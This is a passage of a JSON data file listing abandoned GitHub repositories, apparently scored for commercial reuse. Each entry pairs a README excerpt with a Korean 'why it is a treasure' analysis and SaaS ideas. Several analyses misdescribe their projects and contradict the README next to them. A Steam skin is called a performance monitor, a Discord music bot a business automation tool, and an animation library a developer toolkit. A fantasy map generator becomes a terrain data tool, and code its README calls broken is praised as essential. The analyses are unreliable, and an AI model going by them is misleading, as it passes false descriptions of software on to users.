Example\n\n","composite_score":0.5149,"license_safety_tag":"unknown"},{"name":"ds300/jetzt","github_url":"https://github.com/ds300/jetzt","stars":499,"language":"JavaScript","license":"NOASSERTION","abandonment_months":60,"description":"# ds300/jetzt 분석 보고서\n\n## 왜 보물인가\n거의 500명의 개발자가 별점을 줄 만큼 수요가 있는 프로젝트지만, 마지막 업데이트가 3년 전으로 관리되지 않고 있어 새로운 관리자가 이을 기회가 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 실시간 데이터 처리가 필요한 구독형 분석 도구로 월간 구독료 받기\n- **내부 업무 도구","readme_excerpt":"# jetzt\n\n*jetzt* is a speed-reader extension for [Chrome](http://google.com/chrome) inspired by [Spritz](http://www.spritzinc.com/).\n\n### Screenshot\n\nHere's what jetzt looks like in your browser:\n\n![](img/screenshot.png)\n\n### More Info\n\n- Read about [how to install](https://ds300.github.io/jetzt/#install) (Chrome extension and bookmarklet)\n\n- Consult the [usage instructions](https://ds300.github.io/jetzt/#use)\n\n- Check out the [online demo](http://ds300.github.com/jetzt/demo.html)\n\n### Contributions\n\nWe are looking for contributions! See the [CONTRIBUTING.md](CONTRIBUTING.md) for more information.\n\n### License\n\nLicenced under the Apache License 2.0.\n\nSee [LICENCE.md](LICENSE.md) and [NOTICE.md](NOTICE.md) for more information.\n\n### | (• ◡•)| (❍ᴥ❍ʋ)\n","composite_score":0.5149,"license_safety_tag":"unknown"},{"name":"Po-Hsun-Su/pytorch-ssim","github_url":"https://github.com/Po-Hsun-Su/pytorch-ssim","stars":6,"language":"Python","license":"NOASSERTION","abandonment_months":27,"description":"# PyTorch SSIM 저장소 분석\n\n## 왜 보물인가\n두 개의 이미지가 얼마나 비슷한지 측정하는 핵심 기술로, 이미지 품질 검사부터 의료 영상 분석까지 다양한 산업에서 필수적으로 사용됩니다.\n\n## 어디에 쓸 수 있나\n1. **이미지 편집 SaaS 서비스**: 사진 보정 전후 품질을 자동으로 평가하는 기능\n2. **의료영상 진단 API**: 병원의 C","readme_excerpt":"# pytorch-ssim (This repo is not maintained) \n\nThe code doesn't work because it is on super old pytorch.\n\n### Differentiable structural similarity (SSIM) index.\n![einstein](https://raw.githubusercontent.com/Po-Hsun-Su/pytorch-ssim/master/einstein.png) ![Max_ssim](https://raw.githubusercontent.com/Po-Hsun-Su/pytorch-ssim/master/max_ssim.gif)\n\n## Installation\n1. Clone this repo.\n2. Copy \"pytorch_ssim\" folder in your project.\n\n## Example\n### basic usage\n```python\nimport pytorch_ssim\nimport torch\nfrom torch.autograd import Variable\n\nimg1 = Variable(torch.rand(1, 1, 256, 256))\nimg2 = Variable(torch.rand(1, 1, 256, 256))\n\nif torch.cuda.is_available():\n    img1 = img1.cuda()\n    img2 = img2.cuda()\n\nprint(pytorch_ssim.ssim(img1, img2))\n\nssim_loss = pytorch_ssim.SSIM(window_size = 11)\n\nprint(ssim_loss(img1, img2))\n\n```\n### maximize ssim\n```python\nimport pytorch_ssim\nimport torch\nfrom torch.autograd import Variable\nfrom torch import optim\nimport cv2\nimport numpy as np\n\nnpImg1 = cv2.imread(\"einst","composite_score":0.5149,"license_safety_tag":"unknown"},{"name":"taylorlu/Speaker-Diarization","github_url":"https://github.com/taylorlu/Speaker-Diarization","stars":499,"language":"Python","license":"Apache-2.0","abandonment_months":60,"description":"# Speaker-Diarization 오픈소스 프로젝트 분석\n\n## 왜 보물인가\n여러 사람이 말하는 상황에서 \"누가 언제 말했는지\"를 자동으로 구분해주는 AI 기술로, 회의 기록, 팟캐스트 자막, 고객 콜센터 분석 등에 필수적입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업 회의 자동 정리 플랫폼 (발언자별 구분된 회의록 제공)\n2.","readme_excerpt":"# Speaker-Diarization\n\nThis project contains:\n* Text-independent Speaker recognition module based on VGG-Speaker-recognition\n* Speaker diarization based on UIS-RNN.</br>\n* *Mainly borrowed from UIS-RNN and VGG-Speaker-recognition, just link the 2 projects by generating speaker embeddings to make everything easier, and also provide an intuitive display panel*\n## Prerequisites\n1. pytorch 1.3.0\n2. keras\n3. Tensorflow 1.8-1.15\n4. pyaudio (About how to install on windows, refer to [pyaudio_portaudio](https://github.com/intxcc/pyaudio_portaudio))\n\n## Outline\n### 1. Speaker recognition.</br>\n    cd ghostvlad\n    python predict.py\n\nThe confusion matrix of 4 persons utterances is as below\n\n    0.00  0.32  0.40  | 0.70  0.62  0.76  | 0.81  0.83  0.76  | 0.92  0.83  0.89  |\n\n    0.32  0.00  0.48  | 0.68  0.58  0.76  | 0.87  0.84  0.83  | 0.92  0.82  0.86  |\n\n    0.40  0.48  0.00  | 0.71  0.65  0.74  | 0.79  0.81  0.72  | 0.90  0.84  0.85  |\n\n    ***************************************************","composite_score":0.5149,"license_safety_tag":"safe"},{"name":"Moonshile/ChineseWordSegmentation","github_url":"https://github.com/Moonshile/ChineseWordSegmentation","stars":499,"language":"Python","license":"MIT","abandonment_months":70,"description":"# ChineseWordSegmentation 상용화 분석\n\n## 왜 보물인가\n중국어 문장을 의미 있는 단어 단위로 자동으로 끊어내는 기술로, 중국어 검색·분석·번역 등 수많은 서비스의 핵심 기반이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중국어 문서 자동 분류·검색 플랫폼 (예: 중국 뉴스 모니터링 서비스)\n- **내부 업","readme_excerpt":"# ChineseWordSegmentation\nChinese word segmentation algorithm without corpus\n\n## Usage\n```\nfrom wordseg import WordSegment\ndoc = u'十四是十四四十是四十，十四不是四十，四十不是十四'\nws = WordSegment(doc, max_word_len=2, min_aggregation=1, min_entropy=0.5)\nws.segSentence(doc)\n```\n\nThis will generate words\n\n`十四 是 十四 四十 是 四十 ， 十四 不是 四十 ， 四十 不是 十四`\n\nIn fact, `doc` should be a long enough document string for better results. In that condition, the min_aggregation should be set far greater than 1, such as 50, and min_entropy should also be set greater than 0.5, such as 1.5.\n\nBesides, both input and output of this function should be decoded as unicode.\n\n`WordSegment.segSentence` has an optional argument `method`, with values `WordSegment.L`, `WordSegment.S` and `WordSegment.ALL`, means\n\n+ `WordSegment.L`: if a long word that is combinations of several shorter words found, given only the long word.\n+ `WordSegment.S`: given the several shorter words.\n+ `WordSegment.ALL`: given both the long and the shorters.\n\n## Referen","composite_score":0.5148,"license_safety_tag":"safe"},{"name":"willowtreeapps/spruce-android","github_url":"https://github.com/willowtreeapps/spruce-android","stars":8,"language":"Java","license":"MIT","abandonment_months":64,"description":"# Spruce Android 저장소 분석\n\n## 왜 보물인가\n안드로이드 앱 개발을 더 간단하고 빠르게 만들어주는 도구 모음으로, 개발자들의 반복적인 작업을 줄여줍니다.\n\n## 어디에 쓸 수 있나\n1. **개발사 내부 도구**: 안드로이드 앱을 만드는 회사들이 자사 개발팀의 생산성을 높이기 위해 구독\n2. **개발 강의 플랫폼**: 온라인 코딩 교육 회사가","readme_excerpt":"![Spruce Logo](https://github.com/willowtreeapps/spruce-android/blob/master/imgs/header_image.png)\n\n# Spruce Android Animation Library (and [iOS](https://github.com/willowtreeapps/spruce-ios))\n[![CircleCI Build Status](https://circleci.com/gh/willowtreeapps/spruce-android.svg?style=shield)](https://circleci.com/gh/willowtreeapps/spruce-android)\n[![License MIT](https://img.shields.io/badge/License-MIT-blue.svg?style=flat)]()\n[![Public Yes](https://img.shields.io/badge/Public-yes-green.svg?style=flat)]()\n\n## What is it?\nSpruce is a lightweight animation library that helps choreograph the animations on the screen. With so many different animation libraries out there, developers need to make sure that each view is animating at the appropriate time. Spruce can help designers request complex multi-view animations and not have the developers cringe at the prototype.\n\n<p align=\"center\">\n<img src=\"https://github.com/willowtreeapps/spruce-android/blob/master/imgs/recycler-example.gif\" width=25% ","composite_score":0.5147,"license_safety_tag":"safe"},{"name":"ShomyLiu/pytorch-relation-extraction","github_url":"https://github.com/ShomyLiu/pytorch-relation-extraction","stars":500,"language":"Python","license":"unknown","abandonment_months":74,"description":"# pytorch-relation-extraction 상용화 분석\n\n## 왜 보물인가\n문서나 텍스트에서 단어들 간의 관계를 자동으로 찾아내는 기술로, 뉴스 기사 분석이나 기업 정보 추출에 바로 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS**: 뉴스 플랫폼이 기사에서 \"누가 누구와 거래했다\" 같은 관계를 자동 추출해 시각화하는 서비스\n- ","readme_excerpt":"\r\n**2019.03.09更新**:\r\n\r\n- 更新至Python3.X\r\n- 更新至Pytorch 0.4+(移除Variable等)\r\n- 使用mask作 Piece Pooling\r\n- 相比FilterNYT,建议使用大版本数据集NYT\r\n\r\n\r\n2019.03.05:\r\n\r\n修复`mask piece wise`的bug.\r\n\r\n- 更新至pytorch 0.4+, 0.3版本不兼容\r\n\r\n\r\n2018.11.3:\r\n\r\n**基于mask的**`use_pcnn=True`目前有一些问题，正在修改, 建议:\r\n\r\n- 直接使用 `use_pcnn=False` 测试，性能差不太多\r\n- 使用mask修改之前的版本: https://github.com/ShomyLiu/pytorch-relation-extraction/tree/7e3ef1720d43690fc0da0d81e54bdc0fc0cf822a\r\n\r\n\r\n2018.10.14更新：\r\n\r\n全监督的关系抽取PCNN(Zeng 2014)的代码地址: [PCNN](https://github.com/ShomyLiu/pytorch-pcnn)\r\n\r\n\r\n2018.9.10 更新:\r\n- 参考OpenNRE使用mask可以快速计算piece wise pooling.\r\n    - 修改NYT 53类数据处理 (完成)\r\n    - 修改NYT 27类数据处理 (未完成)\r\n    \r\n数据处理已经修改\r\n\r\n使用Pytorch 复现 PCNN+MIL (Zeng 2015) 与 PCNN+ATT (Lin 2016), 以及两个模型在两个大小版本的数据集上(27类关系/53类关系)的表现对比。\r\n\r\n\r\n\r\n相关博客:\r\n\r\n- [关系抽取论文笔记](http://shomy.top/2018/02/28/relation-extraction/)\r\n\r\n- [复现结果说明](http://shomy.top/2018/07/05/pytorch-relation-extraction/)\r\n\r\n\r\n\r\n在代码的组织,结构设计上,  主要参考 [陈云Pytorch实战指南](https://zhuanlan.zhihu.com/p/29024978) (个人推荐)。因此一些实现细节就","composite_score":0.5146,"license_safety_tag":"unknown"},{"name":"smoothnlp/FinancialDatasets","github_url":"https://github.com/smoothnlp/FinancialDatasets","stars":500,"language":"","license":"unknown","abandonment_months":82,"description":"# FinancialDatasets 상용화 분석\n\n## 왜 보물인가\n금융 데이터를 정리해둔 자료집으로, 금융 서비스나 투자 앱을 만들 때 필요한 기초 재료를 즉시 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **주식 분석 SaaS 서비스**: 개인 투자자를 위한 자동 주식 추천 웹 서비스에 데이터를 연동해 구독료 형태로 판매\n2. **금융사 내부","readme_excerpt":"﻿# FinancialDatasets\nSmoothNLP 金融文本数据集(公开) | Public Financial Datasets for NLP Researches \n\n[**API接口服务**](https://github.com/smoothnlp/smoothnlp_api)\n\n## 数据一览\n> 由于github存储有限, 如需**全量**数据集, 请**联系**: contact@smoothnlp.com\n\n| 数据名称  | 数据字段 | 样本量 | 总量 |  下载链接 |\n| ----- |  ------ | ----- | ----- | ----- |\n| 企业工商信息 | `名称`,`公司名称`,`公司介绍`,`工商`,`地址`,`工商注册id`,`成立时间`,`法人代表`,`注册资金`,`统一信用代码`,`网址` | 1万 | 50万 - (上市及中小型企业) |[下载](https://github.com/smoothnlp/FinancialDatasets/blob/master/data/SmoothNLP%E5%B7%A5%E5%95%86%E6%95%B0%E6%8D%AE%E9%9B%86%E6%A0%B7%E6%9C%AC10K.xlsx) | \n| 金融讯息新闻 | `title-新闻标题`,`content-新闻内容`,`pub_ts-发稿日期` | 2万 | 210万 | [下载](https://github.com/smoothnlp/FinancialDatasets/blob/master/data/SmoothNLP%E4%B8%93%E6%A0%8F%E8%B5%84%E8%AE%AF%E6%95%B0%E6%8D%AE%E9%9B%86%E6%A0%B7%E6%9C%AC10k.xlsx) |\n| 专栏资讯 | `title-新闻标题`,`content-新闻内容`,`pub_ts-发稿日期` | 1万 | 58万 | [下载](https://github.com/smoothnlp/FinancialDatasets/blob/master/data/SmoothNLP%E4%B8%93%E6%A0%8F%E8%B5%84%E8%AE%AF%E6%95%B0%E6%8D%AE%E9","composite_score":0.5146,"license_safety_tag":"unknown"},{"name":"DirtDiglett/Pressure-for-Steam","github_url":"https://github.com/DirtDiglett/Pressure-for-Steam","stars":498,"language":"CSS","license":"NOASSERTION","abandonment_months":85,"description":"# DirtDiglett/Pressure-for-Steam 분석\n\n## 왜 보물인가\n스팀(Steam)이라는 게임 플랫폼의 시스템 성능을 모니터링하고 관리할 수 있는 도구로, 게임 개발사와 스트리머들이 실시간으로 게임 상태를 추적할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 게임 개발사 대상 \"게임 성능 모니터링 클라우드 서비스\" ","readme_excerpt":"Pressure for Steam\n==================\nPressure is a skin for Valve's Steam client that seeks to improve the visuals and aesthetics of Steam beyond the default skin.\n\nPressure for Steam is currently a Work-In-Progress so expect it to change a lot between now and the official public release of the skin. Pressure is currently in BETA so expect bugs. Please report them on the Issues page.\n### IMPORTANT\nIt is extremely important you follow the instructions below, and absolutely critical that you install ALL the fonts in the fonts folder or this skin will not look as intended. FontFabric have generously given me permission to include it in the Git Download so you can install it there or via their website.\nYou must also ensure that you are using the current BETA version of Steam, as otherwise this skin will not work correctly. You can do this by going into Steam Settings, Choose Account on the left and on the right click \"Change...\" under the BETA Participation and opt-in to Steam Beta. After","composite_score":0.5146,"license_safety_tag":"unknown"},{"name":"CodingDocs/awesome-cs","github_url":"https://github.com/CodingDocs/awesome-cs","stars":5,"language":"","license":"unknown","abandonment_months":36,"description":"# CodingDocs/awesome-cs 분석\n\n## 왜 보물인가\n컴퓨터 과학의 핵심 개념들을 정리한 학습 자료로, 개발자들이 기초부터 심화까지 체계적으로 공부할 수 있는 로드맵 역할을 합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발 입문자를 위한 온라인 학습 플랫폼으로, 구독료를 받고 체계적인 커리큘럼을 제공\n2. **내부 업무 ","readme_excerpt":"> [JavaGuide 官方知识星球](https://www.yuque.com/docs/share/8a30ffb5-83f3-40f9-baf9-38de68b906dc)来啦！！！如果你需要专属面试小册/一对一交流/简历修改/专属求职指南/学习打卡，不妨花 3 分钟左右看看星球的详细介绍： [JavaGuide 知识星球详细介绍](https://www.yuque.com/docs/share/8a30ffb5-83f3-40f9-baf9-38de68b906dc) （一定要确定自己真的需要再加入，一定要看完详细介绍之后再加我）。\n\n<div align=\"center\">\n    <p>\n        <a href=\"https://www.yuque.com/docs/share/8a30ffb5-83f3-40f9-baf9-38de68b906dc\">\n            <img src=\"https://oss.javaguide.cn/xingqiu/xingqiu.png\" style=\"margin: 0 auto; width: 850px;\" />\n        </a>\n    </p>\n    <p>  \n        <a href=\"https://github.com/CodingDocs/awesome-cs]\">Github</a> |\n        <a href=\"https://gitee.com/SnailClimb/awesome-cs\">Gitee</a>\n    </p>  \n</div>\n\n精选优质计算机书籍，希望能够帮助到你。\n\n开源的目的是为了大家能一起完善，如果你觉得内容有任何需要完善/补充的地方，欢迎大家在项目 [issues 区](https://github.com/CodingDocs/awesome-cs/issues) 推荐自己认可的 技术书籍，让我们共同维护一个优质的技术书籍精选集！\n\n如果内容对你有帮助的话，欢迎给本项目点个 Star。我会用我的业余时间持续完善这份名单，感谢！\n\n由于项目内容过多，阅读起来不太方便，我已将其同步到了自己网站：\n\n- [计算机基础必读经典书籍](https://javaguide.cn/books/cs-basics.html)\n-","composite_score":0.5145,"license_safety_tag":"unknown"},{"name":"galnir/Master-Bot","github_url":"https://github.com/galnir/Master-Bot","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":28,"description":"# Master-Bot 상용화 분석\n\n## 왜 보물인가\n자동으로 여러 작업을 처리해주는 봇으로, 반복적인 업무를 줄여 시간을 크게 절약할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 중소 기업의 고객 관리, 주문 처리, 데이터 정리 등을 자동화하는 구독형 웹 서비스\n**2. 내부 업무 도구**: 대기업의 HR팀이 채용 지원자 관","readme_excerpt":"# A Discord Music Bot written in TypeScript using Sapphire, discord.js, Next.js and React\n\n[![image](https://img.shields.io/badge/language-typescript-blue)](https://www.typescriptlang.org)\n[![image](https://img.shields.io/badge/node-%3E%3D%2016.0.0-blue)](https://nodejs.org/)\n\n## System dependencies\n\n- [Node.js LTS or latest](https://nodejs.org/en/download/)\n- [Java 13](https://www.azul.com/downloads/?package=jdk#download-openjdk) (other versions have some issues with Lavalink)\n\n## Setup bot\n\nCreate an [application.yml](https://github.com/freyacodes/lavalink/blob/master/LavalinkServer/application.yml.example) file root folder.\n\nDownload the latest Lavalink jar from [here](https://github.com/Cog-Creators/Lavalink-Jars/releases) and also place it in the root folder.\n\n### PostgreSQL\n\n#### Linux\n\nEither from the official site or follow the tutorial for your [distro](https://www.digitalocean.com/community/tutorial_collections/how-to-install-and-use-postgresql).\n\n#### MacOS\n\nGet [brew](https","composite_score":0.5145,"license_safety_tag":"safe"},{"name":"yandex/tomita-parser","github_url":"https://github.com/yandex/tomita-parser","stars":500,"language":"C","license":"NOASSERTION","abandonment_months":67,"description":"# Yandex Tomita Parser 평가 보고서\n\n## 왜 보물인가\n텍스트에서 필요한 정보를 자동으로 찾아내는 기술로, 문서 처리나 검색 서비스에 필수적인 핵심 엔진입니다.\n\n## 어디에 쓸 수 있나\n- **법률 문서 자동 분석 SaaS**: 계약서에서 주요 조항(금액, 기한, 당사자)을 자동 추출하여 변호사 사무소에 판매\n- **채용공고 정보 수집 ","readme_excerpt":"[![Travis](https://img.shields.io/travis/yandex/tomita-parser/master.svg?style=plastic)](https://travis-ci.org/yandex/tomita-parser)\n\nHow to build?\n\n1. Install cmake 2.8, lua 5.2, gcc 4.8.1\n2. Create directory \"build/\" on the same level as \"src/\"\n3. cd build\n4. cmake ../src/ -DCMAKE_BUILD_TYPE=Release\n5. make\n6. copy libmystem-c-binding.so from https://github.com/yandex/tomita-parser/releases/tag/v1.0 to the same folder\n\n# Compiling on Linux\n\n## Ubuntu\n\n1. sudo apt-get install build-essential cmake lua5.2\n2. git clone https://github.com/yandex/tomita-parser\n3. cd tomita-parser && mkdir build && cd build\n4. cmake ../src/ -DCMAKE_BUILD_TYPE=Release\n5. make\n6. copy libmystem-c-binding.so from https://github.com/yandex/tomita-parser/releases/tag/v1.0 to the same folder\n\n## Fedora (RHEL, CentOS, etc.)\n\nThe following packages should be installed before compiling on an `x86_64` machine:\n\n* `gcc`,\n* `cmake`,\n* `lua`,\n* `libstdc++-static`.\n\nPlease note that the `glibc-devel.i686` package should","composite_score":0.5145,"license_safety_tag":"unknown"},{"name":"mewo2/terrain","github_url":"https://github.com/mewo2/terrain","stars":6,"language":"JavaScript","license":"mit","abandonment_months":119,"description":"# Terrain 저장소 분석\n\n## 왜 보물인가\n지형 데이터를 처리하는 가벼운 도구로, 지도 서비스나 게임 개발에 필요한 핵심 기능을 간단히 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **지도 기반 SaaS**: 부동산 중개 플랫폼이 지형 정보를 표시하는 기능에 활용\n2. **게임 개발 도구**: 모바일 게임에서 산악 지형을 자동으로 생성하는 내부 도구","readme_excerpt":"# Fantasy map generator\n\nThis is code for generating fantasy maps, using the algorithm behind [@unchartedatlas][uncharted]. For more details, see [these notes][notes].\n\n## Dependencies\n\nThis code depends on the following:\n\n * [D3.js][d3] (tested with version 4.2.0)\n * Adam Hooper's [js-priority-queue][priority]\n * My [language generation code][language]\n\n## Support, licensing, ongoing development\n\nThis project is, from my perspective, finished.\n\nThe code is available under the [MIT license][license], so you can fork it,\nimprove it, learn from it, build upon it. However, I have no interest in\nmaintaining it as an ongoing open source project, nor in providing support for\nit. Pull requests will be either ignored or closed.\n\nIf you do make something interesting with this code, please do still let me know! I'm sorry that I can't provide any support, but I am still genuinely interested in seeing creative applications of the code.\n\n[uncharted]: https://twitter.com/unchartedatlas\n[notes]: http","composite_score":0.5145,"license_safety_tag":"safe"},{"name":"alphaSeclab/windows-security","github_url":"https://github.com/alphaSeclab/windows-security","stars":499,"language":"","license":"unknown","abandonment_months":76,"description":"# Windows Security 저장소 분석\n\n## 왜 보물인가\nWindows 컴퓨터의 보안 취약점을 찾고 관리하는 기술로, 기업들이 해킹으로부터 시스템을 지키는 데 핵심적으로 필요한 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 보안 관리 SaaS**: 중소기업들이 직원 컴퓨터의 보안 상태를 한눈에 모니터링하고 자동으로 위험을 알려주는 월간 구","readme_excerpt":"# [所有收集类项目](https://github.com/alphaSeclab/all-my-collection-repos)\n\n\n\n\n# Windows\n\n\n- 跟Windows安全有关的资源收集。当前包括的工具个数1100+，并根据功能进行了粗糙的分类。部分工具添加了中文描述。当前包括文章数3300+。\n- 此页只包含部分内容. [查看完整版](https://github.com/alphaSeclab/windows-security/blob/master/Readme_full.md)\n- [English Version](https://github.com/alphaSeclab/windows-security/blob/master/Readme_en.md)\n\n# 目录\n- [PowerShell](#686597a4cff20c60a8e86116cde645fb)\n    - [PowerSploit](#c65ce176ec6f9bbce520d5b97f4067db) ->  [(4)工具](#65a67d0db02390cee295385191ee5ee0) [(12)文章](#0ab243d6d9d07fd24d8aa9a44ea03e89)\n    - [PSAttack](#7a02de4887610ec52c49e64b95fe1580) ->  [(3)工具](#65edc029f91b76eab19a2adb39966d55) [(3)文章](#5f6fc3b3e1eac08f477163970696725e)\n    - [其他](#f00255b09a7cea498b2672c2c7447a04) ->  [(5)工具](#882141dceab035af73809b75c83477f1) [(7)文章](#06d2309e0637f481cdfac132c86142b3)\n- [DLL](#89f963773ee87e2af6f9170ee60a7fb2)\n    - [新添加](#4dcfd9135aa5321b7fa65a88155256f9) ->  [(107)工具](#9753a9d52e19c69dc119bf03e9d7c3d2) [(152)文章](#b05f4c5cdfe64e1dde2a","composite_score":0.5145,"license_safety_tag":"unknown"},{"name":"ilkarman/DeepLearningFrameworks","github_url":"https://github.com/ilkarman/DeepLearningFrameworks","stars":17,"language":"Jupyter Notebook","license":"MIT","abandonment_months":44,"description":"# DeepLearningFrameworks 상용화 분석\n\n## 왜 보물인가\n인공지능 모델을 쉽게 만들고 비교할 수 있도록 정리된 실용적인 코드 모음이라, 기업에서 바로 활용 가능한 기초 자산입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업 고객용 \"AI 모델 성능 비교 플랫폼\" - 같은 데이터로 여러 인공지능 기법의 정확도를 한눈에","readme_excerpt":"# Deep Learning Framework Examples\n   \n<p align=\"center\">\n<img src=\"support/logo.png\" alt=\"logo\" width=\"50%\"/>\n</p>\n\n\n**For more details check out our [blog-post](https://blogs.technet.microsoft.com/machinelearning/2018/03/14/comparing-deep-learning-frameworks-a-rosetta-stone-approach/)**\n\n## Goal\n\n1. Create a Rosetta Stone of deep-learning frameworks to allow data-scientists to easily leverage their expertise from one framework to another\n2. Optimised GPU code with using the most up-to-date highest-level APIs.\n3. Common setup for comparisons across GPUs (potentially CUDA versions and precision)\n4. Common setup for comparisons across languages (Python, Julia, R)\n5. Possibility to verify expected performance of own installation\n4. Collaboration between different open-source communities\n\nThe notebooks are executed on an Azure [Deep Learning Virtual Machine](https://azuremarketplace.microsoft.com/en-us/marketplace/apps/microsoft-ads.dsvm-deep-learning). \n\n*Accuracies (and other metrics) a","composite_score":0.5145,"license_safety_tag":"safe"},{"name":"coderwhy/LearnMiniProgram","github_url":"https://github.com/coderwhy/LearnMiniProgram","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":60,"description":"# LearnMiniProgram 사업화 분석\n\n## 왜 보물인가\n스마트폰 앱을 만드는 방법을 배우고 싶어 하는 초보자들을 위한 학습 자료 모음으로, 진입장벽이 낮은 교육 콘텐츠 사업의 기초가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 온라인 강의 플랫폼에서 '미니 프로그램 개발 입문' 코스로 패키징하여 월 구독료 수익화\n- ","readme_excerpt":"# 小程序课程\n### 小程序学习\n\n> 本项目是学习小程序开发的练习项目，课程完全免费，如果对您有帮助，欢迎star\n\n讲解视频：链接: https://pan.baidu.com/s/1O2vkYTs2wAzXhniZz79Rfg 提取码: tbgw \n\n课程代码：https://github.com/coderwhy/LearnMiniProgram\n\n课程大纲：\n\n<img src=\"http://ww1.sinaimg.cn/large/006qtd2Tgy1g4mcohirioj30te0fc0tx.jpg\"/>\n\n\n\n### 代码如何运行\n\n> 课程中的每个知识点使用tag进行管理，所以查看对应的知识点需要切换tag\n\n1.将代码clone到本地（注意这里不能直接download）\n\n```shell\ngit clone https://github.com/coderwhy/LearnMiniProgram\n```\n\n2.进入目录，查看某个知识点，切换到对应的tag\n\n```shell\ngit checkout 12_登录流程和演练\n```\n\n\n\n### 项目展示\n\n项目代码：https://github.com/coderwhy/HYMiniMall\n\n<img src=\"http://ww1.sinaimg.cn/large/006qtd2Tgy1g4j9tfqhdfj30u01szafo.jpg\"  width=\"200px\"/><img src=\"http://ww1.sinaimg.cn/large/006qtd2Tgy1g4j9tfsqusj30u01sztet.jpg\" width=\"200px\"/><img src=\"http://ww1.sinaimg.cn/large/006qtd2Tgy1g4j9tfwmc3j30u01szq7q.jpg\" width=\"200px\"/><img src=\"http://ww1.sinaimg.cn/large/006qtd2Tgy1g4j9tfraclj30u01szq77.jpg\" width=\"200px\"/><img src=\"http://ww1.sinaimg.cn/large/006qtd2Tgy1g4j9tfm80cj30u01szgnw.jpg\" width=\"200px\"/>","composite_score":0.5144,"license_safety_tag":"safe"},{"name":"uknowsec/Active-Directory-Pentest-Notes","github_url":"https://github.com/uknowsec/Active-Directory-Pentest-Notes","stars":5,"language":"","license":"unknown","abandonment_months":77,"description":"# Active-Directory-Pentest-Notes 분석\n\n## 왜 보물인가\n회사의 컴퓨터 네트워크 보안을 점검하고 취약점을 찾는 실전 기술 매뉴얼로, 보안 담당자들이 실제로 필요로 하는 검증된 정보입니다.\n\n## 어디에 쓸 수 있나\n1. **보안 컨설팅 SaaS**: 기업의 네트워크 보안 진단 서비스에 이 지식을 기반으로 한 자동 검사 도구 제공\n","readme_excerpt":"# Active-Directory-Pentest-Notes\n\n## 声明\n\n仅记录学习笔记，类似学生时代的笔记本，不是为了别人而写~\n\n不喜勿喷，不喜勿视~\n\n如有错误，请及时提醒，以免误导他人\n\nhttps://uknowsec.cn\n\nuknowsec@gmail.com\n\n## 域环境下载\n\n链接：https://pan.baidu.com/s/1j7OgZ3pOnSNxBCHbnUZ4SQ \n提取码：z7m8 \n\n感谢@klion师傅分享的域环境。\n\n## 目录\n\n[域渗透-Kerberos](https://github.com/uknowsec/Active-Directory-Pentest-Notes/blob/master/Notes/域渗透-Kerberos.md)\n\n[域渗透-SPN](https://github.com/uknowsec/Active-Directory-Pentest-Notes/blob/master/Notes/域渗透-SPN.md)\n\n[域渗透-MS14-068](https://github.com/uknowsec/Active-Directory-Pentest-Notes/blob/master/Notes/域渗透-MS14-068.md)\n\n[域渗透-Ticket](https://github.com/uknowsec/Active-Directory-Pentest-Notes/blob/master/Notes/域渗透-Ticket.md)\n\n[域渗透-Delegation](https://github.com/uknowsec/Active-Directory-Pentest-Notes/blob/master/Notes/域渗透-Delegation.md)\n\n[域渗透-域内信息收集](https://github.com/uknowsec/Active-Directory-Pentest-Notes/blob/master/Notes/域渗透-域内信息收集.md)\n\n[域渗透-获取NTDS.dit](https://github.com/uknowsec/Active-Directory-Pentest-Notes/blob/master/Notes/域渗透-获取NTDS.dit.md)","composite_score":0.5144,"license_safety_tag":"unknown"},{"name":"crypto-chasers/builder-register","github_url":"https://github.com/crypto-chasers/builder-register","stars":7,"language":"","license":"unknown","abandonment_months":44,"description":"# crypto-chasers/builder-register 분석\n\n## 왜 보물인가\n암호화폐 개발자들이 자신의 프로젝트를 등록하고 관리할 수 있는 중앙 플랫폼으로, 블록체인 업계의 성장에 따라 수요가 증가할 수 있는 인프라입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 암호화폐 프로젝트 팀이 구독료를 내고 자신의 프로젝트 정보를 등록·관","readme_excerpt":"# builder登记说明\n\n人满有一段时间了，暂时关闭申请\n","composite_score":0.5144,"license_safety_tag":"unknown"},{"name":"kuaikuaikim/DFace","github_url":"https://github.com/kuaikuaikim/DFace","stars":13,"language":"Python","license":"Apache-2.0","abandonment_months":27,"description":"# DFace 저장소 분석\n\n## 왜 보물인가\n사진에서 자동으로 얼굴을 인식하고 분석하는 기술로, 보안 시스템부터 마케팅 분석까지 다양한 산업에서 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 출입 통제 시스템이나 보안 카메라 솔루션으로 기업에 월 구독 판매\n2. **내부 업무 도구**: 소매점이나 은행에서 고객 인증/확인","readme_excerpt":"<div align=center>\n<a href=\"https://dface.tech\" target=\"_blank\"><img src=\"http://dftech.oss-cn-hangzhou.aliyuncs.com/web/DFACE-logo_dark.png\" width=\"160\"></a>\n</div>\n\n-----------------\n# Dface • [![License](http://dftech.oss-cn-hangzhou.aliyuncs.com/opendface/img/apache_2.svg)](https://opensource.org/licenses/Apache-2.0)\n\n\n| **`Linux CPU`** | **`Linux GPU`** | **`Mac OS CPU`** | **`Windows CPU`** |\n|-----------------|---------------------|------------------|-------------------|\n| [![Build Status](http://dftech.oss-cn-hangzhou.aliyuncs.com/opendface/img/build_pass.svg)](http://dftech.oss-cn-hangzhou.aliyuncs.com/opendface/img/build_pass.svg) | [![Build Status](http://dftech.oss-cn-hangzhou.aliyuncs.com/opendface/img/build_pass.svg)](http://dftech.oss-cn-hangzhou.aliyuncs.com/opendface/img/build_pass.svg) | [![Build 